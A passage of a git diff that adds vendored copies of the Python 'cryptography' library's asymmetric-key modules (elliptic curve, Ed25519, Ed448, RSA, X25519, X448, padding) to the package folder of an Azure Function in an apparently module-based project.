unsafe construction of public numbers from " + "encoded data will be removed in a future version. " + "Please use EllipticCurvePublicKey.from_encoded_point", + utils.PersistentlyDeprecated2019, + stacklevel=2, + ) + + if data.startswith(b"\x04"): + # key_size is in bits. Convert to bytes and round up + byte_length = (curve.key_size + 7) // 8 + if len(data) == 2 * byte_length + 1: + x = int.from_bytes(data[1 : byte_length + 1], "big") + y = int.from_bytes(data[byte_length + 1 :], "big") + return cls(x, y, curve) + else: + raise ValueError("Invalid elliptic curve point data length") + else: + raise ValueError("Unsupported elliptic curve point type") + + @property + def curve(self) -> EllipticCurve: + return self._curve + + @property + def x(self) -> int: + return self._x + + @property + def y(self) -> int: + return self._y + + def __eq__(self, other: object) -> bool: + if not isinstance(other, EllipticCurvePublicNumbers): + return NotImplemented + + return ( + self.x == other.x + and self.y == other.y + and self.curve.name == other.curve.name + and self.curve.key_size == other.curve.key_size + ) + + def __hash__(self) -> int: + return hash((self.x, self.y, self.curve.name, self.curve.key_size)) + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + +class EllipticCurvePrivateNumbers: + def __init__( + self, private_value: int, public_numbers: EllipticCurvePublicNumbers + ): + if not isinstance(private_value, int): + raise TypeError("private_value must be an integer.") + + if not isinstance(public_numbers, EllipticCurvePublicNumbers): + raise TypeError( + "public_numbers must be an EllipticCurvePublicNumbers " + "instance." + ) + + self._private_value = private_value + self._public_numbers = public_numbers + + def private_key( + self, backend: typing.Any = None + ) -> EllipticCurvePrivateKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_elliptic_curve_private_numbers(self) + + @property + def private_value(self) -> int: + return self._private_value + + @property + def public_numbers(self) -> EllipticCurvePublicNumbers: + return self._public_numbers + + def __eq__(self, other: object) -> bool: + if not isinstance(other, EllipticCurvePrivateNumbers): + return NotImplemented + + return ( + self.private_value == other.private_value + and self.public_numbers == other.public_numbers + ) + + def __hash__(self) -> int: + return hash((self.private_value, self.public_numbers)) + + +class ECDH: + pass + + +_OID_TO_CURVE = { + EllipticCurveOID.SECP192R1: SECP192R1, + EllipticCurveOID.SECP224R1: SECP224R1, + EllipticCurveOID.SECP256K1: SECP256K1, + EllipticCurveOID.SECP256R1: SECP256R1, + EllipticCurveOID.SECP384R1: SECP384R1, + EllipticCurveOID.SECP521R1: SECP521R1, + EllipticCurveOID.BRAINPOOLP256R1: BrainpoolP256R1, + EllipticCurveOID.BRAINPOOLP384R1: BrainpoolP384R1, + EllipticCurveOID.BRAINPOOLP512R1: BrainpoolP512R1, + EllipticCurveOID.SECT163K1: SECT163K1, + EllipticCurveOID.SECT163R2: SECT163R2, + EllipticCurveOID.SECT233K1: SECT233K1, + EllipticCurveOID.SECT233R1: SECT233R1, + EllipticCurveOID.SECT283K1: SECT283K1, + EllipticCurveOID.SECT283R1: SECT283R1, + EllipticCurveOID.SECT409K1: SECT409K1, + EllipticCurveOID.SECT409R1: SECT409R1, + EllipticCurveOID.SECT571K1: SECT571K1, + EllipticCurveOID.SECT571R1: SECT571R1, +} + + +def get_curve_for_oid(oid: ObjectIdentifier) -> typing.Type[EllipticCurve]: + try: + return _OID_TO_CURVE[oid] + except KeyError: + raise LookupError( + "The provided object identifier has no matching elliptic " + "curve class" + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py new file mode 100644 index 0000000..cef025c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed25519.py @@ -0,0 +1,92 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +_ED25519_KEY_SIZE = 32 +_ED25519_SIG_SIZE = 64 + + +class Ed25519PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "Ed25519PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def verify(self, signature: bytes, data: bytes) -> None: + """ + Verify the signature. + """ + + +class Ed25519PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "Ed25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "Ed25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed25519_supported(): + raise UnsupportedAlgorithm( + "ed25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed25519_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> Ed25519PublicKey: + """ + The Ed25519PublicKey derived from the private key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def sign(self, data: bytes) -> bytes: + """ + Signs the data. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py new file mode 100644 index 0000000..0fdeeec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ed448.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class Ed448PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "Ed448PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed448_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def verify(self, signature: bytes, data: bytes) -> None: + """ + Verify the signature. + """ + + +class Ed448PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "Ed448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + return backend.ed448_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "Ed448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.ed448_supported(): + raise UnsupportedAlgorithm( + "ed448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + return backend.ed448_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> Ed448PublicKey: + """ + The Ed448PublicKey derived from the private key. + """ + + @abc.abstractmethod + def sign(self, data: bytes) -> bytes: + """ + Signs the data. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py new file mode 100644 index 0000000..e3ea0ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py @@ -0,0 +1,101 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives._asymmetric import ( + AsymmetricPadding as AsymmetricPadding, +) +from cryptography.hazmat.primitives.asymmetric import rsa + + +class PKCS1v15(AsymmetricPadding): + name = "EMSA-PKCS1-v1_5" + + +class _MaxLength: + "Sentinel value for `MAX_LENGTH`." + + +class _Auto: + "Sentinel value for `AUTO`." + + +class _DigestLength: + "Sentinel value for `DIGEST_LENGTH`." + + +class PSS(AsymmetricPadding): + MAX_LENGTH = _MaxLength() + AUTO = _Auto() + DIGEST_LENGTH = _DigestLength() + name = "EMSA-PSS" + _salt_length: typing.Union[int, _MaxLength, _Auto, _DigestLength] + + def __init__( + self, + mgf: "MGF", + salt_length: typing.Union[int, _MaxLength, _Auto, _DigestLength], + ) -> None: + self._mgf = mgf + + if not isinstance( + salt_length, (int, _MaxLength, _Auto, _DigestLength) + ): + raise TypeError( + "salt_length must be an integer, MAX_LENGTH, " + "DIGEST_LENGTH, or AUTO" + ) + + if isinstance(salt_length, int) and salt_length < 0: + raise ValueError("salt_length must be zero or greater.") + + self._salt_length = salt_length + + +class OAEP(AsymmetricPadding): + name = "EME-OAEP" + + def __init__( + self, + mgf: "MGF", + algorithm: hashes.HashAlgorithm, + label: typing.Optional[bytes], + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + self._mgf = mgf + self._algorithm = algorithm + self._label = label + + +class MGF(metaclass=abc.ABCMeta): + _algorithm: hashes.HashAlgorithm + + +class MGF1(MGF): + MAX_LENGTH = _MaxLength() + + def __init__(self, algorithm: hashes.HashAlgorithm): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + self._algorithm = algorithm + + +def calculate_max_pss_salt_length( + key: typing.Union["rsa.RSAPrivateKey", "rsa.RSAPublicKey"], + hash_algorithm: hashes.HashAlgorithm, +) -> int: + if not isinstance(key, (rsa.RSAPrivateKey, rsa.RSAPublicKey)): + raise TypeError("key must be an RSA public or private key") + # bit length - 1 per RFC 3447 + emlen = (key.key_size + 6) // 8 + salt_length = emlen - hash_algorithm.digest_size - 2 + assert salt_length >= 0 + return salt_length diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py new file mode 100644 index 0000000..9b56e72 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py @@ -0,0 +1,425 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing +from math import gcd + +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives._asymmetric import AsymmetricPadding +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class RSAPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def decrypt(self, ciphertext: bytes, padding: AsymmetricPadding) -> bytes: + """ + Decrypts the provided ciphertext. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the public modulus. + """ + + @abc.abstractmethod + def public_key(self) -> "RSAPublicKey": + """ + The RSAPublicKey associated with this private key. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + """ + Signs the data. + """ + + @abc.abstractmethod + def private_numbers(self) -> "RSAPrivateNumbers": + """ + Returns an RSAPrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +RSAPrivateKeyWithSerialization = RSAPrivateKey + + +class RSAPublicKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def encrypt(self, plaintext: bytes, padding: AsymmetricPadding) -> bytes: + """ + Encrypts the given plaintext. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the public modulus. + """ + + @abc.abstractmethod + def public_numbers(self) -> "RSAPublicNumbers": + """ + Returns an RSAPublicNumbers + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + """ + Verifies the signature of the data. + """ + + @abc.abstractmethod + def recover_data_from_signature( + self, + signature: bytes, + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> bytes: + """ + Recovers the original data from the signature. + """ + + +RSAPublicKeyWithSerialization = RSAPublicKey + + +def generate_private_key( + public_exponent: int, + key_size: int, + backend: typing.Any = None, +) -> RSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + _verify_rsa_parameters(public_exponent, key_size) + return ossl.generate_rsa_private_key(public_exponent, key_size) + + +def _verify_rsa_parameters(public_exponent: int, key_size: int) -> None: + if public_exponent not in (3, 65537): + raise ValueError( + "public_exponent must be either 3 (for legacy compatibility) or " + "65537. Almost everyone should choose 65537 here!" + ) + + if key_size < 512: + raise ValueError("key_size must be at least 512-bits.") + + +def _check_private_key_components( + p: int, + q: int, + private_exponent: int, + dmp1: int, + dmq1: int, + iqmp: int, + public_exponent: int, + modulus: int, +) -> None: + if modulus < 3: + raise ValueError("modulus must be >= 3.") + + if p >= modulus: + raise ValueError("p must be < modulus.") + + if q >= modulus: + raise ValueError("q must be < modulus.") + + if dmp1 >= modulus: + raise ValueError("dmp1 must be < modulus.") + + if dmq1 >= modulus: + raise ValueError("dmq1 must be < modulus.") + + if iqmp >= modulus: + raise ValueError("iqmp must be < modulus.") + + if private_exponent >= modulus: + raise ValueError("private_exponent must be < modulus.") + + if public_exponent < 3 or public_exponent >= modulus: + raise ValueError("public_exponent must be >= 3 and < modulus.") + + if public_exponent & 1 == 0: + raise ValueError("public_exponent must be odd.") + + if dmp1 & 1 == 0: + raise ValueError("dmp1 must be odd.") + + if dmq1 & 1 == 0: + raise ValueError("dmq1 must be odd.") + + if p * q != modulus: + raise ValueError("p*q must equal modulus.") + + +def _check_public_key_components(e: int, n: int) -> None: + if n < 3: + raise ValueError("n must be >= 3.") + + if e < 3 or e >= n: + raise ValueError("e must be >= 3 and < n.") + + if e & 1 == 0: + raise ValueError("e must be odd.") + + +def _modinv(e: int, m: int) -> int: + """ + Modular Multiplicative Inverse. Returns x such that: (x*e) mod m == 1 + """ + x1, x2 = 1, 0 + a, b = e, m + while b > 0: + q, r = divmod(a, b) + xn = x1 - q * x2 + a, b, x1, x2 = b, r, x2, xn + return x1 % m + + +def rsa_crt_iqmp(p: int, q: int) -> int: + """ + Compute the CRT (q ** -1) % p value from RSA primes p and q. + """ + return _modinv(q, p) + + +def rsa_crt_dmp1(private_exponent: int, p: int) -> int: + """ + Compute the CRT private_exponent % (p - 1) value from the RSA + private_exponent (d) and p. + """ + return private_exponent % (p - 1) + + +def rsa_crt_dmq1(private_exponent: int, q: int) -> int: + """ + Compute the CRT private_exponent % (q - 1) value from the RSA + private_exponent (d) and q. + """ + return private_exponent % (q - 1) + + +# Controls the number of iterations rsa_recover_prime_factors will perform +# to obtain the prime factors. Each iteration increments by 2 so the actual +# maximum attempts is half this number. +_MAX_RECOVERY_ATTEMPTS = 1000 + + +def rsa_recover_prime_factors( + n: int, e: int, d: int +) -> typing.Tuple[int, int]: + """ + Compute factors p and q from the private exponent d. We assume that n has + no more than two factors. This function is adapted from code in PyCrypto. + """ + # See 8.2.2(i) in Handbook of Applied Cryptography. + ktot = d * e - 1 + # The quantity d*e-1 is a multiple of phi(n), even, + # and can be represented as t*2^s. + t = ktot + while t % 2 == 0: + t = t // 2 + # Cycle through all multiplicative inverses in Zn. + # The algorithm is non-deterministic, but there is a 50% chance + # any candidate a leads to successful factoring. + # See "Digitalized Signatures and Public Key Functions as Intractable + # as Factorization", M. Rabin, 1979 + spotted = False + a = 2 + while not spotted and a < _MAX_RECOVERY_ATTEMPTS: + k = t + # Cycle through all values a^{t*2^i}=a^k + while k < ktot: + cand = pow(a, k, n) + # Check if a^k is a non-trivial root of unity (mod n) + if cand != 1 and cand != (n - 1) and pow(cand, 2, n) == 1: + # We have found a number such that (cand-1)(cand+1)=0 (mod n). + # Either of the terms divides n. + p = gcd(cand + 1, n) + spotted = True + break + k *= 2 + # This value was not any good... let's try another! + a += 2 + if not spotted: + raise ValueError("Unable to compute factors p and q from exponent d.") + # Found ! + q, r = divmod(n, p) + assert r == 0 + p, q = sorted((p, q), reverse=True) + return (p, q) + + +class RSAPrivateNumbers: + def __init__( + self, + p: int, + q: int, + d: int, + dmp1: int, + dmq1: int, + iqmp: int, + public_numbers: "RSAPublicNumbers", + ): + if ( + not isinstance(p, int) + or not isinstance(q, int) + or not isinstance(d, int) + or not isinstance(dmp1, int) + or not isinstance(dmq1, int) + or not isinstance(iqmp, int) + ): + raise TypeError( + "RSAPrivateNumbers p, q, d, dmp1, dmq1, iqmp arguments must" + " all be an integers." + ) + + if not isinstance(public_numbers, RSAPublicNumbers): + raise TypeError( + "RSAPrivateNumbers public_numbers must be an RSAPublicNumbers" + " instance." + ) + + self._p = p + self._q = q + self._d = d + self._dmp1 = dmp1 + self._dmq1 = dmq1 + self._iqmp = iqmp + self._public_numbers = public_numbers + + @property + def p(self) -> int: + return self._p + + @property + def q(self) -> int: + return self._q + + @property + def d(self) -> int: + return self._d + + @property + def dmp1(self) -> int: + return self._dmp1 + + @property + def dmq1(self) -> int: + return self._dmq1 + + @property + def iqmp(self) -> int: + return self._iqmp + + @property + def public_numbers(self) -> "RSAPublicNumbers": + return self._public_numbers + + def private_key(self, backend: typing.Any = None) -> RSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_rsa_private_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RSAPrivateNumbers): + return NotImplemented + + return ( + self.p == other.p + and self.q == other.q + and self.d == other.d + and self.dmp1 == other.dmp1 + and self.dmq1 == other.dmq1 + and self.iqmp == other.iqmp + and self.public_numbers == other.public_numbers + ) + + def __hash__(self) -> int: + return hash( + ( + self.p, + self.q, + self.d, + self.dmp1, + self.dmq1, + self.iqmp, + self.public_numbers, + ) + ) + + +class RSAPublicNumbers: + def __init__(self, e: int, n: int): + if not isinstance(e, int) or not isinstance(n, int): + raise TypeError("RSAPublicNumbers arguments must be integers.") + + self._e = e + self._n = n + + @property + def e(self) -> int: + return self._e + + @property + def n(self) -> int: + return self._n + + def public_key(self, backend: typing.Any = None) -> RSAPublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_rsa_public_numbers(self) + + def __repr__(self) -> str: + return "".format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RSAPublicNumbers): + return NotImplemented + + return self.e == other.e and self.n == other.n + + def __hash__(self) -> int: + return hash((self.e, self.n)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py new file mode 100644 index 0000000..4848ac1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py @@ -0,0 +1,69 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives.asymmetric import ( + dh, + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) + + +# Every asymmetric key type +PUBLIC_KEY_TYPES = typing.Union[ + dh.DHPublicKey, + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, +] +# Every asymmetric key type +PRIVATE_KEY_TYPES = typing.Union[ + dh.DHPrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + x25519.X25519PrivateKey, + x448.X448PrivateKey, +] +# Just the key types we allow to be used for x509 signing. This mirrors +# the certificate public key types +CERTIFICATE_PRIVATE_KEY_TYPES = typing.Union[ + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, +] +# Just the key types we allow to be used for x509 signing. This mirrors +# the certificate private key types +CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES = typing.Union[ + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, +] +# This type removes DHPublicKey. x448/x25519 can be a public key +# but cannot be used in signing so they are allowed here. +CERTIFICATE_PUBLIC_KEY_TYPES = typing.Union[ + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py new file mode 100644 index 0000000..35e356c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py @@ -0,0 +1,24 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.hazmat.bindings._rust import asn1 +from cryptography.hazmat.primitives import hashes + + +decode_dss_signature = asn1.decode_dss_signature +encode_dss_signature = asn1.encode_dss_signature + + +class Prehashed: + def __init__(self, algorithm: hashes.HashAlgorithm): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of HashAlgorithm.") + + self._algorithm = algorithm + self._digest_size = algorithm.digest_size + + @property + def digest_size(self) -> int: + return self._digest_size diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py new file mode 100644 index 0000000..f0bb831 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py @@ -0,0 +1,81 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class X25519PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "X25519PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x25519_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + +class X25519PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "X25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + return backend.x25519_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "X25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x25519_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> X25519PublicKey: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: X25519PublicKey) -> bytes: + """ + Performs a key exchange operation using the provided peer's public key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py new file mode 100644 index 0000000..64260b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py @@ -0,0 +1,81 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class X448PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "X448PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x448_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. + """ + + +class X448PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "X448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + return backend.x448_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "X448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x448_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> X448PublicKey: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: X448PublicKey) -> bytes: + """ + Performs a key exchange operation using the provided peer's public key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py new file mode 100644 index 0000000..4120422 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py @@ -0,0 +1,27 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.hazmat.primitives._cipheralgorithm import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) +from cryptography.hazmat.primitives.ciphers.base import ( + AEADCipherContext, + AEADDecryptionContext, + AEADEncryptionContext, + Cipher, + CipherContext, +) + + +__all__ = [ + "Cipher", + "CipherAlgorithm", + "BlockCipherAlgorithm", + "CipherContext", + "AEADCipherContext", + "AEADDecryptionContext", + "AEADEncryptionContext", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b94998d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc differ diff --git 